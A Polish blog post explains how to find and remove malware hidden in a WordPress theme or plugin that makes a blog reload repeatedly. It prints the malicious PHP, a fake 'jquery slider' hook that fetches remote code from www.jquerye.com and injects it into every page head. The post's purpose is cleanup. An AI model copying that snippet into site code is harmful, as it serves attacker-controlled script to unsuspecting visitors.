Home Różne Blog na wordpressie przeładowuje się raz za razem

Blog na wordpressie przeładowuje się raz za razem

Opublikowany w Opublikowany w Różne Brak komentarzy Tagged with , , ,

Jeżeli z jakiegoś powodu Twój blog zaczął świrować, to może znaczyć, że zainstalowałeś szablon/wtyczkę, której celem było np. infekowanie komputerów ludzi odwiedzających Twoją stronę. Po zatrzymaniu przeglądarki i wyświetleniu źródła strony znaleźć możemy między innymi zapis:

InitiateFrameRequest();

Szkodnik jest ciężki do znalezienia, ponieważ wymieniona powyżej linia nie występuje w żadnym pliku. Na szczęście jest inny, łatwiejszy sposób, na odnalezienie właściwego pliku. Należy znaleźć wszystkie pliki zawierające słowa: curl , add_action oraz wp_head. Nie będzie ich zbyt wiele i w jednym z nich znajdziemy kod podobny do tego umieszczonego poniżej:


<?php if (!function_exists('insert_jquery_sslider')){function insert_jquery_sslider(){
if (function_exists('curl_init')){$url = "www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init();
$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}
add_action('wp_head', 'insert_jquery_sslider');
}
?>

Gdy już wiemy co to za plik, to możemy zrobić z tym porządek, np. wywalić całą zawartość. Następny krok zależy od tego, gdzie siedział złośliwy kod. Jeżeli jest to płatna wtyczka i mamy na komputerze zipa z jej zawartością, to możemy sprawdzić czy już w archiwum siedział złośliwy kod i jeżeli tak, to np. poinformować autora o problemie. Jeżeli wtyczka jest sprzedawana np. na CodeCanyon, to możemy również poinformować serwis o zaistniałym problemie.

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

*